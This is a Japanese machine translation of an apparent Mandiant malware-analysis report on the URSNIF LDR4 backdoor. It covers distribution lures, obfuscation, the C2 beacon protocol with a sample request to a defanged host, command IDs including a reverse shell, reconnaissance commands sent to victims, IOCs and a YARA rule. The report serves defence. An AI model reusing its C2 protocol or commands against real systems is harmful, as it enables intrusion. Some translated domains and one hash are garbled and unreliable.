RM3 から LDR4 へ: URSNIF は銀行詐欺を置き去りにします

Genealogy of different URSNIF branches and variants news

2022 年 6 月に初めて確認された URSNIF マルウェアの新しい亜種は、このツールにとって重要なマイルストーンです。 URSNIF の以前の反復とは異なり、LDR4 と呼ばれるこの新しい亜種はバンカーではなく、ランサムウェアやデータ窃盗強要などの操作を可能にするために意図的に構築された可能性がある一般的なバックドア (短命のSAIGON 亜種に似ています) です。これは、銀行詐欺を可能にするというマルウェアの本来の目的からの大きな変化ですが、より広範な脅威の状況と一致しています。

Mandiant は、URSNIF の RM3 亜種を操作したのと同じ攻撃者が LDR4 の背後にいる可能性が高いと考えています。以前の RM3 の成功と巧妙さを考えると、LDR4 は非常に危険な亜種 (ランサムウェアを配布できる可能性がある) である可能性があり、注意深く監視する必要があります。

簡単な歴史

現在でも活動を続けている最も古いバンキング マルウェア ファミリの 1 つであることから、URSNIF (別名 Gozi または Gozi/ISFB) の背後に長く冒険的な歴史があり、他のマルウェア ファミリや亜種と絡み合っていることは驚くに値しません。 2016 年に最初のメジャー バージョンが登場して以来、そのソース コードは少なくとも 2 回漏洩しており、その結果、他の亜種が生まれ、現在でも複数の亜種が流通しています (IAP など)。これは、Gozi も URSNIF も単一のマルウェア ファミリではなく、関連する兄弟のセット (通常は亜種と呼ばれる) のようなものであることを意味します。今日、ほとんどの研究者はマルウェア ファミリ名 Gozi で標準化していますが、主に歴史的な理由から、Mandiant を含む他の研究者やベンダーは、これらの亜種を URSNIF (2000 年代半ばに Haxdoor で Gozi が発生した古いマルウェア) として参照しています。または ISFB (技術的には、このバンキング マルウェア ファミリの最新のブランチ) です。明確にするために、このブログ投稿全体で、現在も活動している現在の亜種を参照する際に、URSNIF (Mandiant の命名スキームに従って大文字で表記) を使用しています。

近年、ISFB に基づく URSNIF の複数の亜種が実際に観察されています。

  • Dreambot – 最も成功した亜種の 1 つ
  • IAP – 最も活発に開発および配布されている ISFB ブランチであり、CUTWAIL からイタリアを標的とするマルウェア キャンペーンが頻繁に行われています。
  • RM2 – GoziAT としても広く知られ、数年前に Chanitor マルウェア (別名 Hancitor) で活動を開始しました。
  • RM3 – カスタムの実行可能ファイル形式により、これまでで最も洗練されたバージョンであり、2017 年以降、主にオセアニアと英国に影響を与えています。

これを書いている時点で、私たちの調査によると、悪名高い URSNIF バンキング マルウェアの最後で唯一のアクティブなブランチは ISFB である可能性があります。過去 3 年間で、このバンキング マルウェアにはいくつかの興味深い変化が見られました。これは、大きなパラダイム シフトを示唆し、プロジェクト全体が再設計されたことを示しています。

Genealogy of different URSNIF branches and variants
図 1: さまざまな URSNIF ブランチとバリアントの系譜

マルウェア開発者の観点から見ると、非常に多くの異なるプロジェクト (この場合はフォーク) に更新を提供することは複雑な作業であり、必然的に行き詰まりや間違いにつながります。 Mandiant は、IAP 2.0 と RM2 はバージョン 2.50.000 を超えるビルドであり、RM3 はバージョン 3.00.700 を超えるビルドであり、不要な機能を削除し、すべてのフォークと開発ブランチを 1 つのメイン ブランチにマージすることに重点を置いていると考えています。この統合の取り組みをサポートするための注目すべき変更には、次のようなものがあります。

  • RSA 公開鍵は、非常に特殊な埋め込み復号化鍵で暗号化されており、これはすべての亜種に段階的にプッシュされています。
  • AES 暗号化が古い Serpent 暗号化に取って代わりました
  • ビーコン リクエストのフィールドのマージと簡素化

2020 年は、信頼できるディストリビューションが減少し、複数のバックエンドが (主にヨーロッパで) 崩壊したため、RM3 バリアントにとって非常に失敗しました。さらに、この特定の亜種は、TRICKBOT と EMOET の混乱により、市場シェアを獲得するために人気を高める機会を利用できませんでした。この中で最大の勝者の 1 つは ICEDID マルウェア ファミリでした。これは、バンキング マルウェア ランドスケープでの競争の縮小をうまく利用し、RM3 を困難な状況に追い込みました。 URSNIF の ISFB 亜種が 2020 年 6 月以降に更新を受け取らなかったのは非常に珍しいことでした。そのため、一部の研究者は、このバンキング マルウェアが復活する唯一の方法は、そのコードに大規模な改修を行うことであると仮説を立てました。 2022 年 6 月、最終的に Microsoft Windows から Internet Explorer が完全に削除されたことで、RM3 の亜種は技術的な観点から公式に「死んだ」マルウェアとみなされました。RM3 は重要なネットワーク通信の一部をこのブラウザに依存していたためです。

分布

Mandiant は、2021 年 4 月に報告された RM3 の分布に似た、動員関連のルアーを介して、2022 年 6 月 23 日に野生で LDR4 を初めて観察しました (図 2)。電子メールには、正規の企業を装ったドメインにリダイレクトする侵害された Web サイトへのリンクが含まれています (図 3)。電子メールのおとりに関連する情報が含まれているとされる Excel ドキュメントをダウンロードするための CAPTCHA チャレンジが提示されます (図 4 および図 5)。次に、このドキュメントは LDR4 ペイロードをダウンロードして実行します。 LDR4 につながる同様のチェーンが後で観察されましたが、代わりに会計ソフトウェアに関連するルアーが使用されていました (図 6)。

人事/採用に加えて、Mandiant は、Excel ドキュメントの添付ファイルで XLM 4.0 マクロを利用してペイロードをダウンロードする、より従来型の支払い/請求書ルアーでも RM3 を観察しました。 2022 年 4 月に、MOTEISLAND ドキュメントのダウンロードされたペイロードとして UNC2420 経由で最後に配布されたことを確認しました。 Mandiant は UNC2420 を、正当な電子メール チェーンへの返信と思われる件名を使用するキャンペーンで、悪意のある Microsoft Word ドキュメントを添付ファイルとして使用する配布脅威クラスターとして追跡しています。

2021 年 4 月の URSNIF (RM3) のメール ルアー
図 2: 2021 年 4 月の URSNIF (RM3) のメールルアー
2022 年 6 月 23 日の URSNIF (LDR4) の電子メールルアー
図 3: 2022 年 6 月 23 日の URSNIF (LDR4) を狙う電子メールのルアー
2022 年 6 月、Excel ドキュメント ダウンロード用の CAPTCHA ページ
図 4: 2022 年 6 月、Excel ドキュメント ダウンロード用の CAPTCHA ページ
2022 年 6 月 24 日の URSNIF (LDR4) の Excel ドキュメント ダウンローダー
図 5: 2022 年 6 月 24 日の URSNIF (LDR4) の Excel ドキュメント ダウンローダー
2022 年 6 月 24 日の URSNIF (LDR4) の電子メールルアー
図 6: 2022 年 6 月 24 日の URSNIF (LDR4) を狙う電子メールのルアー

静的分析

LDR4 の亜種は、感染したコンピュータ上で DLL モジュールとして表示され、 DllRegisterServer関数を介して呼び出されますが、サンドボックスを混乱させるために、他のランダムな名前のおとり関数がエクスポートされることがよくあります。一部のバイナリは、有効なコード署名証明書を使用していました ( NAILS UNLIMITED LIMITEDANGOSTONE GROUP LTD LIMITEDなど)。バイナリは、32 ビットまたは 64 ビットのアーキテクチャを持つことができ、さまざまな PE クリプターがパックされています。 Mandiant が SPELLBOOK として追跡しているクリプターの 1 つには、「|SPL|」という署名を残すという興味深い特性があります。コアマルウェアを解凍した後のメモリ内。 URSNIF LDR4 と SNOWCONE.GZIPLOADER (ICEDID のローダー コンポーネント) の間で、このクリプターの使用方法が重複していることを確認しました。分析された URSNIF LDR4 サンプルの解凍されたコアには、内部名LOADER.dllがあります。

URSNIF LDR4 は、コード リファクタリング、リグレッション、興味深い単純化戦略を組み合わせたものです。

IAP/RM3/LDR4 ペイロード構造
図 7: IAP/RM3/LDR4 ペイロード構造

主な観察事項は次のとおりです。

  1. PXの時代は終わった。
    LDR4 亜種は、RM3 亜種で最初に導入されたカスタム PX 実行形式を使用しなくなりました。この選択は、ソフトウェアの問題のトラブルシューティングが過度に複雑になるのを避けるために行われたと考えられます。開発者の観点から見ると、問題の表面的なレイヤーに想定されているより多くの時間を費やし、要求された機能のより重要なパイプラインに再び焦点を合わせることが、評判にとって非常に重要です。同様に重要なことは、PX フォーマットがアナリストや AV/EDR 製品の間で悪名高いことを考えると、その道が終わるのは時間の問題でした。攻撃者の観点からは、誰もが検出する方法を知っている製品に投資することは、リソースの効率的な使用とは言えません。そのため、従来の PE 形式を使用してルーツに戻ることは、実際には攻撃者にとって合理的な選択です。
  2. FJ.exeがなくなったのか、作り直されたのか?
    ISFB の開始以来、複数のファイルを 1 つのペイロードに隠すために、 FJ.exe (File Joiner) と呼ばれるステガノグラフィ ツールが使用されています。これは ISFB に固有のものではなく、CARBERP と呼ばれる別の悪名高いバンキング マルウェアから分岐したものです。これら 2 つのコードを比較すると、同じプログラムが両方で使用されていることに疑いの余地はありません。
    ISFB FJ.exe が CARBERP FJ.cpp と重複するコード
    図 8: ISFB FJ.exe オーバーラップ コードと CARBERP FJ.cpp

     

    マルウェアファミリー

    PDB パス / プロジェクト パス

    カーバープ

    bootkit.old/FJ/

    ISFB

    d:workprojectsbk2binreleasei386FJ.pdb (ファイルパスのbk2プロジェクト名は「Bootkit v2」の略)

    FJ.exeバリアントに基づいて URSNIF ペイロードにJJJ1J2 、またはWDフィールドを作成するツールです。しかし LDR4 では、これらのマジック バイトが欠落しており、通常はペイロードの最後にハードコードされている隠しファイルがなくなりました。

  3. LDR4 はバックドアです。
    URSNIF は、EMOTET や TRICKBOT が以前に行ったのと同じ道をたどる最新のマルウェアであり、新しい戦略に焦点を当て、銀行詐欺の遺産を残している. LDR4 は、バンキング マルウェアの機能とモジュールをすべて削除し、VNC やリモート シェルを侵入先のマシンに取り込むことにのみ焦点を当てていることで、その主張を証明しています。

難読化

攻撃的なソフトウェア操作では、コード自体または少なくとも API 呼び出しにある種の難読化を適用して、分析作業を妨害するのが一般的です。 URSNIF は歴史的にこれを使用しませんでした (AV 回避に使用される最も外側のクリプター レイヤーを除く)。ただし、この新しい LDR4 の亜種には、Windows API 呼び出しの難読化が組み込まれていました。最初に、マルウェアが使用する Windows モジュール ( kernel32ntdllcrypt32advapi32ws2_32 ) のエクスポート名とアドレスからハッシュ ルックアップ テーブルを作成し、JAMCRC32 チェックサムをマップします (JAMCRC32 は通常の CRC32 アルゴリズムを変更したものです。ここで、最終チェックサムのすべてのビットが反転されます) 関数名のメモリ内のそれぞれの仮想アドレスに。コードの後半では、Windows API 関数への呼び出しは、関数のアドレスをすばやく取得するために、テーブル内のチェックサム値を検索するだけです。これとは別に、コンパイルされたバイナリでそれ以上のコードの難読化が利用されていないため、LDR4 はリバース エンジニアリングが比較的容易なファミリになっています。

行動

分析中に最も注目されたことの 1 つは、以前の亜種と比較して、開発者がコードのさまざまな部分を簡素化し、クリーンアップしたことです。最も注目すべきは、その銀行機能が完全に廃止されたことです。

マルウェアは、最初に実行可能ファイルの.bssセクションを見つけ、単純な XOR ベースのアルゴリズムを使用して復号化します。これは、PE タイムスタンプ、およびセクションのPointerToRawDataフィールドとSizeOfRawDataフィールドで構成されるキーを使用して実行されます。復号化が成功したことを確認するために、復号化されたデータの一部のチェックサムを計算します。これは、UTF-16 でエンコードされた文字列「無断転載禁止」のチェックサムと一致する必要があります。 .このチェックサムは、後の操作で XOR キーとして使用されます (リークされたソース コードで使用される XOR Cookie 値と同様で、この値はCsCookieとして参照されます)。

次に、レジストリ キーHKLMSYSTEMCurrentControlSetControlの下にあるサブキーを列挙してシステム サービスのリストを収集し、2 つの個別の ID を生成します。システム ID は、 pagefile.sysまたはhiberfil の作成日から派生します。 sys – これは、RM3 および SAIGON の亜種が行った方法とまったく同じです。ユーザー ID は、現在のユーザーのユーザー名の MD5 ハッシュです。

マルウェアのインスタンスが一度に 1 つだけアクティブになるようにするために、ランダム化された名前のミューテックスが作成されます。このミューテックスでは、前の手順で作成されたシステム ID がランダム シード値として使用されます。次に、復号化された構成 ( .bssセクションから) が検証され、必要なボット構成と、コマンド アンド コントロール (C2) サーバーからのデータの復号化に使用される RSA 公開キーの両方が含まれているかどうかが確認されます。これに続いて、 QueueUserAPC ()関数を介してメイン通信スレッドを起動します。

メインの通信ループは、埋め込まれたボット構成から C2 サーバー情報を取得します。

  • IdleTimeオプションが構成に存在する場合、コードはサーバーとの通信を開始する前にこの秒数待機します。
  • RunCommandオプションが存在する場合、その値は別のスレッドで実行され、コマンドの出力は一時ファイルにリダイレクトされます。私たちが見つけたすべてのバイナリには、「 echo Commands 」と「 dir 」という 2 つの組み込みコマンドが含まれていました。

C2 サーバーは、実行するコマンドのリストを含むファイルTASK.BINをダウンロードしようとして、1 つずつ接続されます。潜在的なコマンドのリストは、「機能」セクションで詳しく説明されています。

ネットワーク通信

LDR4 で使用される通信プロトコルは、古い RM3 バリアントで使用されるプロトコルとあまり変わりません。 HTTPS 経由で POST リクエストを使用し、ビーコン URL は / index.htmlで終わります。ユーザー エージェント文字列は、Windows の正確なバージョンとアーキテクチャに応じて次の形式で決まります。

Mozilla/5.0 (Windows NT %d.%d; %s) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36

ユーザー エージェント文字列で古いバージョンの Chrome を使用すると、プロキシ サーバーがアウトバウンド HTTP/HTTPS 接続を監視し、ユーザー エージェント文字列に基づいてブロックまたはアラートできる環境で、適切な検出機会が提供されます。

ビーコン リクエストのクエリ文字列は、次の形式を使用します (RM3 のビーコン形式とほぼ同じです)。

version=%u&user=%s&group=%u&system=%s&file=%08x&arc=%u&crc=%08x&size=%u

パラメータの意味については、次の表で詳しく説明します。

パラメータ名

説明

バージョン

ボットのバージョン、たとえば「100123」(1.00.123)

ユーザー

ユーザーID

グループ

ボットネット ID

システム

システム ID

ファイル

ファイル ID (大文字のファイル名の JAMCRC32 チェックサム)

アーク

ファイル アーキテクチャ (0 ~ x86、1 ~ x64)

crc

ファイルのチェックサム (以前にダウンロードされた場合のみ、そうでない場合は 0)

サイズ

ファイル サイズ (以前にダウンロードされた場合のみ、そうでない場合は 0)

ランダムな名前と値で構成される偽のパラメーターが前述のクエリ文字列の先頭に追加され、リクエストが行われるたびに、リクエスト文字列全体が CBC モードで AES-256 を使用して暗号化され、キーが埋め込まれます (構成のServerKeyを参照)。セクション) および 16 個の「0」文字で構成される初期化ベクトル (IV) を含み、Base64 を使用してエンコードされ (エンコードされた文字列の末尾の「=」文字はすべて削除されます)、POST 要求のペイロードとして送信されます。

初期ビーコンのクエリ文字列の例 (ファイル ID 0x8fd8a91eは、ファイル名TASK.BINに対応します):

clypnrkl=wsktexbmn&version=100123&user=f2472a25a2e15c3d&group=202208152&system=18245c7ff14d7902&file=8fd8a91e&arc=0&crc=00000000&size=0

後続のビーコンのクエリ文字列の例 (既存のTASK.BINサイズは 320 バイトで、その内容のチェックサムは0x3e3edc47 です):

chjm=kckhu&version=100123&user=f2472a25a2e15c3d&group=202208152&system=18245c7ff14d7902file=8fd8a91e&arc=0&crc=3e3edc47&size=320

ネットワーク ビーコンの例 (要求文字列は AES で暗号化され、Base64 としてエンコードされます):

POST /index.html

Host: logotep[.]xyz

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

Content-Type: multipart/form-data; boundary=9808fdecfe274c1d

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36

Content-Length: 285

--9808fdecfe274c1d

Content-Disposition: form-data; name="rcgmbh"

QgrHabeBs9/vsorhqEP2jV88dSwmgvyxepEZczkNSFXt89yV2nH9/7A5QYcIslSIoimlOmGG53oykoFVIfc
rge6eCwchr62tLGsho13OHolmwJBYFYH0+sxqa1AH8qV4CEjKX+UwyioMNnv0QlW9pagvAc6JMo1JoTHjrq
aci07r/dByQSndma/MhZU1aIrI
--9808fdecfe274c1d--

私たちが特定したすべてのコントロール サーバーは、5 ~ 10 文字で構成されるドメイン名を使用し、 .xyz、.cyou または.comのトップレベル ドメインに登録され、Let’s Encrypt TLS 証明書を使用していました。ドメイン名はNamecheapに登録されており、インフラストラクチャは、2022 年 2 月に英国で登録されたStark Industries Solutions Ltd.という名前の会社でホストされており、 Ivan Neculiti という名前のモルドバ人に関連付けられています。この個人は、今年初めに Morphisec によって特定されたように、防弾ホスティング サービスを提供するロシアを拠点とするPerfect Quality Hosting (別名PQ Hosting ) 会社の背後にいる人物と同一人物のようです。

構成

前述のように、URSNIF の LDR4 バリアントでは、構成ストレージが大幅に作り直されました。以前の URSNIF の亜種は、マジック マーカーを使用して、結合ファイルと呼ばれる、バイナリに埋め込まれた追加のファイルを特定していました。魔法のマーカーは、異なる URSNIF バリアント、つまりJFJJJ1J2 、またはWD間で異なります。

この新しい LDR4 の亜種は、結合されたファイルを保存するための新しいデータ構造を導入し、暗号化された.bssセクションの文字列とマージされます。

LDR4 復号化された .bss セクション構造
図 9: LDR4 で復号化された .bss セクションの構造

データ構造には 8 バイトのヘッダーがあり、次のフィールドがあります。

データサイズ

フィールド名

説明

2バイト

次のオフセット

リンクされたリスト内の次の要素へのオフセット。ゼロの場合、それ以上の要素はありません

2バイト

アイテムサイズ

ItemValueフィールドのデータのサイズ (バイト単位)

4バイト

アイテムID

アイテムを一意に識別する値。通常、これはアイテム名の JAMCRC32 ハッシュです。

ItemSizeバイト

アイテム値

現在の要素の値

常に存在しなければならない結合ファイルが 2 つあります。存在しないと、マルウェアは動作しません。ボット構成と、コマンド サーバーからの応答を復号化して検証するために使用される RSA 公開鍵です。他の URSNIF バリアントと同様に、構成オプションは、オプションの大文字名の JAMCRC32 チェックサムである 16 進数で識別されます。オプションの名前は、バイナリまたは構成のどこにも参照されておらず、チェックサムをブルートフォースすることによってのみ見つけることができることに注意してください。

現在知られている構成オプションのリスト:

オプション ID

オプション名

説明

0xb892845a

コントローラ

通信に使用される C2 URL のリスト (空白区切り)

0x656b798a

グループ

ボットネット ID

0x4fa8693e

サーバーキー

C2 との通信に使用される AES キー

0x8c871ff9

アイドルタイム

C2への最初のリクエストまで待機する秒数

0x9d29ade4

リクエストタイム

C2 へのビーコン リクエスト間の秒数

0xf76f421a

ホストキープ時間

通信障害が発生した場合に、次の C2 サーバーを試行するまでに待機する分数

0x08b2f0fb

HostShiftTime

通信が成功した場合、次の C2 サーバーに切り替えるまでの待機時間 (分)

0x89a5deaa

RunCommand

起動時に実行する組み込みの初期コマンド リスト

0x303378c6

<不明>

不明なタイムアウト パラメータです。現在はおそらく使用されていません

機能

マルウェアには次のコマンドが実装されています。

コマンド ID

コマンド名

説明

0xf880e2be

LOAD_DLL

DLL モジュールを現在のプロセスにロードする

0xfee861f1

SHELL_STATE

cmd.exe リバース シェルの状態を取得する

0xc202e685

SHELL_START

cmd.exe リバース シェルを開始します。

0xa5946e4a

SHELL_STOP

cmd.exe リバース シェルを停止します。

0xa04d6355

SHELL_RESTART

cmd.exe リバース シェルを再起動します。

0x5d2295b5

RUN_COMMAND

任意のコマンドを実行する

0x5d639645

出口

終了

新しい被害者に送信されたことを確認した最も一般的な 2 つのコマンドは、ネットワークの偵察に関連しています。

  • RUN_COMMAND=ネット グループ「ドメイン コンピュータ」/ドメイン
  • RUN_COMMAND=ネットセッション

同じ 2 つのコマンドは、過去に URSNIF の RM3 亜種からも観察されました。これは、2 つの亜種間の関連性を証明するもう 1 つの行動特性です。

コマンド シェル

組み込みのコマンド シェル機能は、リモート IP アドレスに接続するリバース シェルを提供し、攻撃者がcmd.exeプログラムを介してシステム コマンドを実行できるようにします。この機能は、RM3 の亜種が別のcmdshell.dllプラグインを介して提供したものとほとんど同じです。接続先のリモート IP アドレスとポート番号は、実行時にSHELL_STARTコマンドの引数として提供されます。この機能により、攻撃者はハンズオン キーボード攻撃を実行し、さらにホストとネットワークの偵察を実行し、ラテラル ムーブメントを実行できます。

プラグイン

以前の URSNIF の亜種には、LOAD_PLUGIN コマンドを介してロードされたさまざまなプラグインでマルウェアの機能を拡張できる機能がありましたが、分析した URSNIF LDR4 バイナリには実装されていませんでした。ただし、VNC モジュールが LOAD_DLL コマンドを介してダウンロードされた事例が少なくとも 1 回確認されています。したがって、LOAD_DLL コマンドは、任意の DLL モジュールを介してマルウェアの機能を拡張することにより、プラグインのような機能を提供する、より単純でより一般的な方法を可能にします (通常のプラグイン DLL は、特定の方法で動作するように実装する必要があります)。主なマルウェア)。興味深いことに、VNC モジュールはまだ組み込み構成を保存する古い方法 ( J1マジック バイトを使用) を使用しているため、元々別の URSNIF バリアント (おそらく IAP 2.0) 用にコンパイルされた可能性があります。

VNCモジュール

ファイル名

vnc64_1.dll

内部名

VncDLL.dll

MD5 ハッシュ

bd4a92d4577ddedeb462a71cdf2fa934

PE タイムスタンプ

火曜日 9 月 14 日 19:32:19 2021

組み込み VNC C2

141[.]98.169.6:80

帰属

一部のLDR4制御サーバーは、詳細なエラー メッセージとファイル パスをリークするように構成されており、ファイル パスは、ボット パネルがwww_loader_ldlというディレクトリ名でユーザーexproのホーム ディレクトリにインストールされていることを示しています(図10 )。

exproホームディレクトリを明らかにするC2サーバーからのエラーメッセージ
図 10: expro のホーム ディレクトリを示す C2 サーバーからのエラー メッセージ

これは、 exproが RM3 と LDR4 の両方の亜種のボット パネルを担当する Web 開発者のニックネームであるという現在の理解を裏付けています。

含意

今年初めの RM3 亜種の終焉と、銀行関連の機能をすべて削除するなど、コードを大幅に簡素化するという作成者の決定は、以前に観察された TTP の劇的な変化を示しています。これらの変化は、脅威アクターが将来的にランサムウェア操作に参加したり、実行したりすることへの関心が高まっていることを反映している可能性があります。この評価は、Mandiant が少なくとも 2022 年初頭以降、新しいランサムウェアと、新しい LDR4 亜種に非常によく似た URSNIF RM3 亜種を配布するパートナーを探しているアンダーグラウンド コミュニティで活動しているアクターを特定したという事実によってさらに裏付けられます。

謝辞

作成者は、LDR4 亜種に関連する追加のマルウェア IOC を提供してくれた Benoit Ancel と、最初のマルウェア サンプルを見つけてくれた Cian Lynch に感謝します。

付録 A: 最近アクティブになった他の URSNIF 亜種との比較

 

IAP 2.0

RM3

LDR4

永続化方法

PowerShell を使用してレジストリ キーに格納されたコードを実行するスケジュールされたタスク

PowerShell を使用してレジストリ キーに格納されたコードを実行するスケジュールされたタスク

持続性なし

構成の保管

セキュリティ PE ディレクトリは、’JJ’ マジック バイトで始まる埋め込みバイナリ データを指します。

セキュリティ PE ディレクトリは、’ WD ‘ マジック バイトで始まる埋め込みバイナリ データを指します

暗号化された.bssセクションに隠される

PRNG アルゴリズム

様々

xorshift64*

様々

チェックサムアルゴリズム

JAMCRC (別名、すべてのビットが反転した CRC32)

JAMCRC (別名、すべてのビットが反転した CRC32)

JAMCRC (別名、すべてのビットが反転した CRC32)

データ圧縮

aPLib

aPLib

無圧縮

暗号化/復号化

古いバージョン: Serpent CBC 新しいバージョン: AES-256 CBC

古いバージョン: Serpent CBC 新しいバージョン: AES-256 CBC

AES-256 CBC

データの完全性検証

RSA署名

RSA署名

RSA署名

通信方法

HTTP GET/POST リクエスト

HTTP GET/POST リクエスト

HTTP POST リクエスト

ペイロードのエンコーディング

パディングなしの Base64 (「+」と「/」はそれぞれ「_2B」と「_2F」に置き換えられます)、ランダムなスラッシュが追加されます

パディングなしの Base64 (「+」と「/」はそれぞれ「_2B」と「_2F」に置き換えられます)、ランダムなスラッシュが追加されます

パディングされていない Base64 (「+」と「/」はそれぞれ「%2B」と「%2F」としてエンコードされた URL です)、ランダムなスラッシュは追加されません

URL パスの模倣を使用していますか?

いいえ

はい

いいえ

PXファイル形式を使用していますか?

いいえ

はい

いいえ

バイナリに埋め込まれたコマンド

はい

いいえ

はい

付録 B: IOC

マルウェアのサンプル ハッシュ:

  • 360417f75090c962adb8021dbb478f67 [ VT ]
  • 3e0f28bcaf35af2802f45b58f49481be
  • 590d96a7be55240ad868ebec78ce38f2
  • 8c658b9b02814927124351484c42a272 [ VT ]
  • 9f68d1a4b33e3ace6215040dc9fc73e8 [ VT ]
  • b4610d340a9bff58616543b10e961cd3
  • baa784967fd0558715f4011a72eb872e [ VT ]
  • bd4a92d4577ddedeb462a71cdf2fa934
  • bea60bab50d47f239132890a343ae84c [ VT ]
  • d38f6f01bb926df07d34de0649f608f6 [ VT ]
  • d6ef4778f7dc9c31a0a2a989ef42d2fd [ VT ]
  • d94657449f8d8c165ef88fd93e463134 [ VT ]
  • eee617806c18710e8635615de6297834 [ VT ]
  • f4b0a6ab164f7c58cccce651606kill [ VT ]

マルウェアのサンプル ハッシュ (解凍):

  • 00b981b4d3f47bcbd32dfa37f3b947e5 [ VT ]
  • 09bc2a1aefbafd3e7577bc3c352c82ad [ VT ]
  • 1b0ec09ca4cb7dcf5d59cea53e1b9c93
  • 3c5f002b46ef11700caca540dcc7c519
  • 498d5e8551802e02fe4fa6cd0425c608
  • 58169007c2e7a0d022bc383f9b9476fe [ VT ]
  • 7808d22a4343b2617ceef63fd0d43651
  • 7eea48e592c4bccbfa3929b1b35a7c0b
  • 89b4dd18bea842fddd021aa74d109ec3
  • a3539bc682f39406c050e5233058c930 [ VT ]
  • ac39f1a22538f0211204037cce30431d
  • c1989d25287cd9044b4d936e73962e35
  • c7facfffad15a9c84239b495770183bb
  • cde05576e7c48ca89d2f21c283a4a018 [ VT ]

ネットワーク インジケータ (ドメイン):

  • astope[.]xyz
  • binchfog[.]xyz
  • ダムネーター[.]com
  • daydayvin[.]xyz
  • dodsman[.]com
  • dodstep[.]ちょう
  • fineg[.]xyz
  • fingerpin[.]ちょう
  • fishenddog[.]xyz
  • 巨人[.]xyz
  • ギガラム[.]com
  • ギギマン[.]xyz
  • ギギマス[.]xyz
  • ヒグモンちょう
  • isteros[.]com
  • kidup[.]xyz
  • ライオンニク[.]xyz
  • ロゴテップ[.]xyz
  • mainwog[.]xyz
  • mamount[.]ちょう
  • ミノトス[.]xyz
  • ピンキ[.]ちょう
  • pipap[.]xyz
  • プライズ[.]ちょう
  • 理由[.]xyz
  • ローフォグ[.]com
  • トーントン[.]xyz
  • バビルゴ[.]xyz

ネットワーク インジケータ (IP アドレス):

  • 5[.]182.36.248 (CH) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 5[.]182.37.136 (RU) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 5[.]182.38.43 (HU) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 5[.]182.38.68 (HU) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 5[.]252.23.238 (SK) – ISP: STARK INDUSTRIES SOLUTIONS LTD (GB)
  • 45[.]8.147.179 (SE) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]8.147.215 (SE) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]67.34.75 (RO) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]67.34.172 (RO) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]67.34.245 (RO) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]67.229.39 (MD) – ISP: スターク インダストリーズ ソリューションズ リミテッド (英国)
  • 45[.]89.54.122 (SK) – ISP: STARK INDUSTRIES SOLUTIONS LTD (GB)
  • 45[.]89.54.152 (SK) – ISP: STARK INDUSTRIES SOLUTIONS LTD (GB)
  • 45[.]95.11.62 (SK) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]140.146.241 (MD) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 45[.]142.212.87 (MD) – ISP: スターク インダストリーズ ソリューションズ リミテッド (英国)
  • 45[.]150.67.4 (MD) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 77[.]75.230.62 (CZ) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 77[.]91.72.15 (HU) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.100.71 (FI) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.100.209 (FI) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.106.8 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.106.16 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.107.13 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.107.132 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 94[.]131.107.252 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 141[.]98.169.6 (FI) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 185[.]250.148.35 (MD) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 188[.]119.112.104 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)
  • 193[.]38.54.157 (NL) – ISP: STARK INDUSTRIES SOLUTIONS LTD (英国)

ユーザー エージェント文字列:

  • Mozilla/5.0 (Windows NT <os_version> ; WOW64) AppleWebKit/537.36 (Gecko のような KHTML) Chrome/87.0.4280.66 Safari/537.36
  • Mozilla/5.0 (Windows NT <os_version> ; Win64; x64) AppleWebKit/537.36 (Gecko のような KHTML) Chrome/87.0.4280.66 Safari/537.36

付録 C: YARA ルール

次の YARA ルールは、適切なパフォーマンスを確保し、誤検知のリスクを制限するために、組織独自の内部テスト プロセスを通じて最初に検証されることなく、運用システムで使用したり、ブロック ルールを通知したりすることを意図したものではありません。この規則は、新しい LDR4 サンプルを特定するためのハンティング作業の開始点として機能することを目的としています。ただし、マルウェア ファミリが変更された場合は、時間の経過とともに調整が必要になる場合があります。

rule URSNIF_LDR4 {

 

    strings:

        $str1 = "LOADER.dll" fullword

        $str2 = "DllRegisterServer" fullword

        $str3 = ".bss" fullword

 

        $x64_code1 = { 3D 2E 62 73 73 74 0A 48 83 C7 28 }

        $x64_code2 = { 8B 17 48 83 C7 04 8B CA 8b C2 23 CB 0B C3 F7 D1 23 C8 41 2B CA 44 8B D2 41 89 08 41 8B CB 49 83 C0 04 83 E1 07 FF C1 41 D3 C2 41 83 EB 04 79 }

        $x64_code3 = { 41 0F B6 01 49 FF C1 8B C8 8B D0 83 E1 03 C1 E1 03 D3 E2 44 03 C2 41 83 C2 FF 75 }

        $x64_code4 = { 45 8D 45 08 48 8D 8C 24 [4] BA 30 00 FE 7F E8 }

